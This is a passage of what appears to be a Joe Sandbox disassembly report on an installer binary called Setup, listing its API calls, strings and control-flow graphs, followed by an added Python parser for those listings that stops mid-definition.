  • Part of subcall function 69DB988C: GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
  • Part of subcall function 69DB988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
  • Part of subcall function 69DA4E70: __EH_prolog3.LIBCMT ref: 69DA4E77
  • Part of subcall function 69DA4E70: __CxxThrowException@8.LIBCMT ref: 69DA4F68
  • Part of subcall function 69DA4E70: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 69DA4F7E
  • Part of subcall function 69DA4E70: FindCloseChangeNotification.KERNEL32(?), ref: 69DA4FA1
  • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
  • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
  • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
  • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
  • Part of subcall function 69DA5033: __EH_prolog3.LIBCMT ref: 69DA503A
  • Part of subcall function 69DA5033: __CxxThrowException@8.LIBCMT ref: 69DA50B6
  • Part of subcall function 69DA51C0: __EH_prolog3_catch.LIBCMT ref: 69DA51C7
  • Part of subcall function 69DA51C0: CoInitialize.OLE32(00000000), ref: 69DA51DC
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DBB471
                                                                                                                                                                      • Part of subcall function 69DBD01E: __EH_prolog3.LIBCMT ref: 69DBD025
                                                                                                                                                                      • Part of subcall function 69DBD01E: PathFileExistsW.SHLWAPI(?,69D661FC,graphics,?,00000054,69DBB48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69DBD0BE
                                                                                                                                                                      • Part of subcall function 69D859B8: __EH_prolog3.LIBCMT ref: 69D859BF
                                                                                                                                                                      • Part of subcall function 69D86083: __EH_prolog3_catch.LIBCMT ref: 69D8608A
                                                                                                                                                                    • GetCommandLineW.KERNEL32(?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?), ref: 69DBB51F
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DBB50F
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,passive,00000000), ref: 69DBB6C8
                                                                                                                                                                      • Part of subcall function 69DA7889: __EH_prolog3.LIBCMT ref: 69DA7890
                                                                                                                                                                      • Part of subcall function 69DA7DB0: __EH_prolog3.LIBCMT ref: 69DA7DB7
                                                                                                                                                                      • Part of subcall function 69DA7C9E: __EH_prolog3.LIBCMT ref: 69DA7CA5
                                                                                                                                                                      • Part of subcall function 69DA7E78: __EH_prolog3.LIBCMT ref: 69DA7E7F
                                                                                                                                                                      • Part of subcall function 69D743C4: __EH_prolog3.LIBCMT ref: 69D743CB
                                                                                                                                                                      • Part of subcall function 69D75E41: __EH_prolog3.LIBCMT ref: 69D75E48
                                                                                                                                                                      • Part of subcall function 69D75E41: PathFindFileNameW.SHLWAPI(?,?,?,0000000C,69D75E13,?,69DA831D,?,0000000C,69D77D3D,?,00000000,?,?,69D6AB18,00000008), ref: 69D75E83
                                                                                                                                                                      • Part of subcall function 69D75E41: PathFindExtensionW.SHLWAPI(?), ref: 69D75EA0
                                                                                                                                                                      • Part of subcall function 69DA6DCB: GetCommandLineW.KERNEL32(F0D05EFD,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 69DA6E16
                                                                                                                                                                      • Part of subcall function 69DA594B: __EH_prolog3.LIBCMT ref: 69DA5952
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,OneInstance,?,00000000,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DBBED4
                                                                                                                                                                      • Part of subcall function 69DAAE4A: __EH_prolog3.LIBCMT ref: 69DAAE51
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,00000001,00000007,?,OneInstance,?,?,00000000,?,?,?,?,?), ref: 69DBBE22
                                                                                                                                                                      • Part of subcall function 69D96F61: __EH_prolog3.LIBCMT ref: 69D96F68
                                                                                                                                                                      • Part of subcall function 69DABE94: _free.LIBCMT ref: 69DABEBC
                                                                                                                                                                      • Part of subcall function 69DABE94: _free.LIBCMT ref: 69DABECD
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 69DBBF2E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Path$CloseCommandException@8FileH_prolog3_catchLineThrow$FindHandle$InitializeNameRelativeThread_free$ChangeCreateDispatcherExceptionExistsExtensionFreeLocaleModuleNotificationReadStringUser
                                                                                                                                                                    • String ID: !$#(loc.ids_wer_message)$%TEMP%\$Blocker$Command-line option error: $CreateFilesInUser$CreateHelpUsage$CreateUiMode$FactoryInitialization$InvalidArguments$OneInstance$PISemanticChecker$ParameterInfo.xml$Parameterinfo.xml or UiInfo.xml has a #Loc that is not defined in LocalizeData.xml $W$passive
                                                                                                                                                                    • API String ID: 1658402695-280204926
                                                                                                                                                                    • Opcode ID: de53e6d29ad6d5b8eb2df9e7175d40c6bab9cf0ceab9e1355233dc41e30834e9
                                                                                                                                                                    • Instruction ID: f5bb862c5a4e994fcb06c0ceea1c2cea616ec3c999018b4c325462a02611a333
                                                                                                                                                                    • Opcode Fuzzy Hash: de53e6d29ad6d5b8eb2df9e7175d40c6bab9cf0ceab9e1355233dc41e30834e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 94E25A75D00258EFCF11DFA8C944ADDBBB8BF05318F1081A9E419BB695CB34AA49CF61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 723 69d8f8cd-69d8f908 call 69dd6e1a call 69da833e 728 69d8f90a-69d8f90c 723->728 729 69d8f910-69d8f93a call 69d795c1 call 69dc8f0e call 69da85bc 723->729 728->729 736 69d8f979-69d8f989 call 69da85bc 729->736 737 69d8f93c-69d8f942 729->737 744 69d8f98b-69d8f991 736->744 745 69d8f9c2-69d8f9d2 call 69da85bc 736->745 738 69d8f950-69d8f964 call 69dc8f0e 737->738 739 69d8f944-69d8f94a 737->739 746 69d8f96c 738->746 747 69d8f966-69d8f968 738->747 739->738 749 69d8f99f-69d8f9b3 call 69dc8f0e 744->749 750 69d8f993-69d8f999 744->750 756 69d8fa12-69d8fa22 call 69da85bc 745->756 757 69d8f9d4-69d8f9da 745->757 752 69d8f971-69d8f976 call 69dd6f06 746->752 747->746 759 69d8f9bb-69d8f9c0 749->759 760 69d8f9b5-69d8f9b7 749->760 750->749 766 69d8fa62-69d8fb0f call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 call 69dd14aa call 69dd6e1a call 69da833e 756->766 767 69d8fa24-69d8fa2a 756->767 762 69d8f9ec-69d8fa00 call 69dc8f0e 757->762 763 69d8f9dc-69d8f9e2 757->763 759->752 760->759 772 69d8fa08-69d8fa0d 762->772 773 69d8fa02-69d8fa04 762->773 763->762 796 69d8fb11-69d8fb13 766->796 797 69d8fb17-69d8fb68 call 69d7a1ff call 69dc8f0e call 69da833e 766->797 769 69d8fa3c-69d8fa50 call 69dc8f0e 767->769 770 69d8fa2c-69d8fa32 767->770 779 69d8fa58-69d8fa5d 769->779 780 69d8fa52-69d8fa54 769->780 770->769 772->752 773->772 779->752 780->779 796->797 804 69d8fb6a-69d8fb6c 797->804 805 69d8fb70-69d8fb92 call 69d78d44 call 69d81c2e 797->805 804->805 810 69d8fb9a-69d8fbd0 call 69dc8f0e call 69da833e 805->810 811 69d8fb94-69d8fb96 805->811 816 69d8fbd8-69d8fbfa call 69d78d44 call 69d81d3d 810->816 817 69d8fbd2-69d8fbd4 810->817 811->810 822 69d8fbfc-69d8fbfe 816->822 823 69d8fc02-69d8fc38 call 69dc8f0e call 69da833e 816->823 817->816 822->823 828 69d8fc3a-69d8fc3c 823->828 829 69d8fc40-69d8fc63 call 
69d78d44 call 69d8784c 823->829 828->829 834 69d8fc6b-69d8fca0 call 69dc8f0e call 69da833e 829->834 835 69d8fc65-69d8fc67 829->835 840 69d8fca8-69d8fcc8 call 69d79411 call 69d83ba9 834->840 841 69d8fca2-69d8fca4 834->841 835->834 846 69d8fcca-69d8fccc 840->846 847 69d8fcd0-69d8fcf0 call 69dc8f0e 840->847 841->840 846->847 850 69d8fcf8-69d8fd7c call 69d86d1f call 69d897ce call 69da833e 847->850 851 69d8fcf2-69d8fcf4 847->851 858 69d8fd7e-69d8fd80 850->858 859 69d8fd84-69d8fdb2 call 69d795c1 call 69dc8f0e 850->859 851->850 858->859 864 69d8fdba-69d8fdf4 call 69d8f8cd call 69da833e 859->864 865 69d8fdb4-69d8fdb6 859->865 870 69d8fdfc-69d8fe03 call 69d790aa 864->870 871 69d8fdf6-69d8fdf8 864->871 865->864 874 69d8fe4a 870->874 875 69d8fe05-69d8fe35 call 69da833e 870->875 871->870 876 69d8fe4c-69d8fe50 874->876 884 69d8fe3d call 69d790aa 875->884 885 69d8fe37-69d8fe39 875->885 878 69d8fe61-69d8fe6b 876->878 879 69d8fe52-69d8fe5c call 69dc8f0e 876->879 882 69d8fe7c-69d8fe7e 878->882 883 69d8fe6d-69d8fe77 call 69dc8f0e 878->883 879->878 888 69d8fe80-69d8fee2 call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 call 69dd14aa 882->888 889 69d8fee7-69d8ff11 call 69da833e 882->889 883->882 890 69d8fe42-69d8fe44 884->890 885->884 888->889 896 69d8ff19-69d8ff20 call 69d7917e 889->896 897 69d8ff13-69d8ff15 889->897 890->874 893 69d8fe46-69d8fe48 890->893 893->876 903 69d8ffa6 896->903 904 69d8ff26-69d8ff53 call 69da833e 896->904 897->896 908 69d8ffa8-69d8ffac 903->908 913 69d8ff5b-69d8ff62 call 69d7917e 904->913 914 69d8ff55-69d8ff57 904->914 911 69d8ffbd-69d8ffc1 908->911 912 69d8ffae-69d8ffb8 call 69dc8f0e 908->912 917 69d8ffd2-69d8ffd9 911->917 918 69d8ffc3-69d8ffcd call 69dc8f0e 911->918 912->911 913->903 930 69d8ff64-69d8ff91 call 69da833e 913->930 914->913 922 69d8ffdb-69d8ffe1 call 69dc8f0e 917->922 923 69d8ffe6-69d8ffe8 917->923 918->917 922->923 927 69d8ffea-69d9004b call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 923->927 928 
69d90050-69d90059 923->928 931 69d9005b-69d9005d 928->931 932 69d90061-69d90068 call 69dd6f06 928->932 942 69d8ff99-69d8ffa0 call 69d7917e 930->942 943 69d8ff93-69d8ff95 930->943 931->932 942->903 948 69d8ffa2-69d8ffa4 942->948 943->942 948->908
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8FAC4
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8FAD6
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8F8D4
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8FEE2
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                                                                                                                                    • String ID: +$ActionTable$ApplicableIf$Compressed$CompressedDownloadSize$CompressedHashValue$Control$CustomErrorHandling$EstimatedInstallTime$IsPresent$Name$ParameterInfo.xml$Pause$RepairOverride$Resume$Start$Stop$UninstallOverride$schema validation failure: ServiceControl does not support Compressed attributes!$schema validation failure: ServiceControl does not support RepairOverride or UninstallOverride child elements!$schema validation failure: Only Start, Stop, Pause and Resumeare supported for 'Control' attribute.
                                                                                                                                                                    • API String ID: 2724732616-360042054
                                                                                                                                                                    • Opcode ID: 5edd397436a0ba2b27c0de58388f5bf15b37acd0e0f98e363d1495310609db87
                                                                                                                                                                    • Instruction ID: 3402739bbbf591397ef5e4edb529e2c2f0c2f9cd85877226eab1e27dc2f00430
                                                                                                                                                                    • Opcode Fuzzy Hash: 5edd397436a0ba2b27c0de58388f5bf15b37acd0e0f98e363d1495310609db87
                                                                                                                                                                    • Instruction Fuzzy Hash: ED425E71900249EFCF00DFA8C944AEDBBB8BF09318F148169F825EB691D735DA05DBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    control_flow_graph 955 698e2b11-698e2ba8 call 6990265b call 698ee8e8 call 698dd65f call 698f8460 call 698ee8e8 call 698dd65f call 698dd76f call 698ee8e8 call 698f8460 974 698e2baa-698e2bac 955->974 975 698e2bb0-698e2c18 call 698f8460 call 698ee8e8 call 698dd65f call 698dd76f call 698ee8e8 call 698f8460 955->975 974->975 988 698e2c1a-698e2c1c 975->988 989 698e2c20-698e2c9b call 698f8460 call 698ee8e8 call 698dd65f call 698f8460 call 698ee8e8 call 698dd6c4 call 698dd76f 975->989 988->989 1004 698e2c9d-698e2c9f 989->1004 1005 698e2ca3-698e2cde call 698f8460 989->1005 1004->1005 1008 698e2ce1-698e2d22 call 698ee8e8 call 698dd6c4 call 698dd76f 1005->1008 1015 698e2d2a-698e2d46 call 698f8460 call 698f8199 1008->1015 1016 698e2d24-698e2d26 1008->1016 1021 698e2d4b-698e2d86 call 698ee8e8 call 698ef5fd call 698f8460 * 2 1015->1021 1022 698e2d48 1015->1022 1016->1015 1021->1008 1031 698e2d8c-698e2da4 call 698e1e75 PathIsRelativeW 1021->1031 1022->1021 1034 698e2dbb-698e2df4 call 698f83fd call 698ef21d * 2 PathFileExistsW 1031->1034 1035 698e2da6-698e2db6 PathFileExistsW 1031->1035 1061 698e2e0e-698e2e13 PathFileExistsW 1034->1061 1062 698e2df6-698e2e0b call 698eea8d call 698ef21d 1034->1062 1036 698e2e5a-698e2e5c 1035->1036 1039 698e2e5e-698e2ebb call 698dc9bb call 698dcb96 call 698f8460 call 698dd1b4 call 698fdbdb 1036->1039 1040 698e2e2c-698e2e37 PathIsRelativeW 1036->1040 1042 698e2ec0-698e2ef3 call 698f83fd call 698ef21d * 2 PathFileExistsW 1039->1042 1041 698e2e3d-698e2e47 PathFileExistsW 1040->1041 1040->1042 1045 698e2f92-698e2f94 1041->1045 1081 698e2f0d-698e2f12 PathFileExistsW 1042->1081 1082 698e2ef5-698e2f0a call 698eea8d call 698ef21d 1042->1082 1052 698e2f96-698e2fef call 698dc9bb call 698dcb96 call 698f8460 call 698dd1b4 1045->1052 1053 698e2f27-698e2f71 call 698f83fd * 2 1045->1053 1119 
698e2ff7-698e2ffa 1052->1119 1079 698e3028-698e305a call 698f8460 * 2 call 698ef5a3 call 698f8460 1053->1079 1080 698e2f77-698e2f82 1053->1080 1067 698e2e4c-698e2e58 call 698f8460 1061->1067 1068 698e2e15-698e2e27 call 698eea8d call 698f8460 1061->1068 1062->1061 1067->1036 1068->1040 1122 698e305c-698e305e 1079->1122 1123 698e3062-698e3081 call 698f8460 * 2 1079->1123 1087 698e2ffc-698e2fff 1080->1087 1090 698e2f84-698e2f90 call 698f8460 1081->1090 1091 698e2f14-698e2f22 call 698eea8d call 698f8460 1081->1091 1082->1081 1098 698e3005-698e300b 1087->1098 1099 698e3093-698e30ab RaiseException 1087->1099 1090->1045 1091->1053 1098->1099 1108 698e3011-698e3026 call 698ef5fd 1098->1108 1108->1079 1108->1119 1119->1087 1122->1123 1128 698e3089-698e3090 call 69902709 1123->1128 1129 698e3083-698e3085 1123->1129 1129->1128
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E2B1B
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698DD76F: SysFreeString.OLEAUT32(00000000), ref: 698DD7CA
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,00000001,?,000000FF,?,?,?,?,00000001,?,?,?,000000FF,00000088,698F6F88,?), ref: 698E2D9C
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2DAF
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698E2DF0
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2E0F
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000001,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2E2F
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000001,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2E40
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698E2EBB
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,00000001,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698E2EEF
                                                                                                                                                                      • Part of subcall function 698EF21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,698DC3AE), ref: 698EF241
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000005,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E2F0E
                                                                                                                                                                      • Part of subcall function 698F83FD: _memcpy_s.LIBCMT ref: 698F844E
                                                                                                                                                                    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 698E309C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Path$ExistsFile$H_prolog3$Relative$AppendExceptionException@8FreeRaiseStringThrow_memcpy_s
                                                                                                                                                                    • String ID: %$Caption$CreateLayout$Default$HeaderImage$Install$Repair$Uninstall$UninstallPatch$Watermark$WizardImages
                                                                                                                                                                    • API String ID: 2164894574-1575104729
                                                                                                                                                                    • Opcode ID: 4a1f7d5472177218e1f3ff34d69bf764fe8e6f637a845f7463521d9bb12d0be0
                                                                                                                                                                    • Instruction ID: ba5f847807a4064f364a77945cbb34cc7fa2eb59a6d6355ace2162b45bece006
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a1f7d5472177218e1f3ff34d69bf764fe8e6f637a845f7463521d9bb12d0be0
                                                                                                                                                                    • Instruction Fuzzy Hash: F5126D7590024DEFDF00DFE8C984ADDBBB8AF16318F149959E425EB291D734DA0ACB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

Control-flow graph for the function at 69db09e3-69db0c8b (graph image not reproduced): each lookup branches on GetLastError; the registry key is opened in block 69db0a9c-69db0ae9 (RegOpenKeyExW), up to three RegQueryValueExW attempts follow at 69db0aef-69db0b14, 69db0b16-69db0b34 and 69db0b36-69db0b4f, each success jumping to RegCloseKey at 69db0b52-69db0b5f; GlobalMemoryStatusEx is called at 69db0be3-69db0bf2 and the function exits through 69db0c77-69db0c8b.
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DB09ED
                                                                                                                                                                      • Part of subcall function 69D75727: GetModuleHandleW.KERNEL32(kernel32.dll,?,69D75782,00000000,69DA831D), ref: 69D75731
                                                                                                                                                                      • Part of subcall function 69D75727: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 69D75741
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB0A27
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB0A82
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,?,00000000,?,Failed to record NumberOfProcessor), ref: 69DB0ADE
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 69DB0B0D
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,~Mhz,00000000,00000000,?,?), ref: 69DB0B2D
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,~mhz,00000000,00000000,?,?), ref: 69DB0B4D
                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 69DB0B55
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB0B75
                                                                                                                                                                    • _memset.LIBCMT ref: 69DB0BCC
                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,69D6A738,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB0BEA
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB0C15
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • GetLastError.KERNEL32(?,GlobalMemoryStatusEx failed,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB0C60
                                                                                                                                                                      • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$QueryValue$H_prolog3$AddressCloseGlobalH_prolog3_HandleMemoryModuleOpenProcStatus_memset
                                                                                                                                                                    • String ID: Failed to record CpuArchitecture$Failed to record NumberOfProcessor$Failed to record SystemMemory$GlobalMemoryStatusEx failed$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz$~Mhz$~mhz
                                                                                                                                                                    • API String ID: 2659457873-2309824155
                                                                                                                                                                    • Opcode ID: 5b2b5f6555dcf1c289ee246594f0091b733bfd855325aff74e085b2ae59fcb42
                                                                                                                                                                    • Instruction ID: afd81bb78ddb21ed4bc37c84d2c0f4578b3c984aa61ee04f486c73593495525a
                                                                                                                                                                    • Opcode Fuzzy Hash: 5b2b5f6555dcf1c289ee246594f0091b733bfd855325aff74e085b2ae59fcb42
                                                                                                                                                                    • Instruction Fuzzy Hash: DF81BCB5900248EBDB20CFE4CE45F9EBBB9AF05354F208635E416EF698D730DA058B60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
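
The API listing for the function at 69DB09E3 above shows a host-sizing routine: GetNativeSystemInfo resolved through GetProcAddress, HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 opened with access mask 00020019 and queried for ~MHz (with two other casings as fallbacks), then GlobalMemoryStatusEx. The same chain appears both in installer system-requirement checks and in hardware-fingerprinting evasion, so an analyst reading these reports wants to pull it out of the raw listing quickly. The parser below is an added example written for this page, not Joe Sandbox code and not part of the sample; it parses API lines in the shape printed above (the sample lines are copied from that listing and embedded so it runs offline), decodes the registry hive and access mask, and flags the inventory calls. The registry constants are the documented Win32 values; the line format is assumed from the listing and may not cover every variant Joe Sandbox emits.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from the "APIs" listing of the
# function at 69DB09E3 above, embedded here so the example runs offline.
SAMPLE_API_LINES = [
    r"• GetLastError.KERNEL32 ref: 69DB0A27",
    r"  • Part of subcall function 69D75727: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 69D75741",
    r"• RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,?,00000000,?,Failed to record NumberOfProcessor), ref: 69DB0ADE",
    r"• RegQueryValueExW.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 69DB0B0D",
    r"• RegQueryValueExW.ADVAPI32(?,~Mhz,00000000,00000000,?,?), ref: 69DB0B2D",
    r"• RegCloseKey.KERNEL32(?), ref: 69DB0B55",
    r"• GlobalMemoryStatusEx.KERNEL32(?,?,?,69D6A738,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB0BEA",
]

# Assumed line shape (from the listing above):
#   • [Part of subcall function <hex>: ]<Api>.<MODULE>[(<args>)], ref: <hex>
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

_HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
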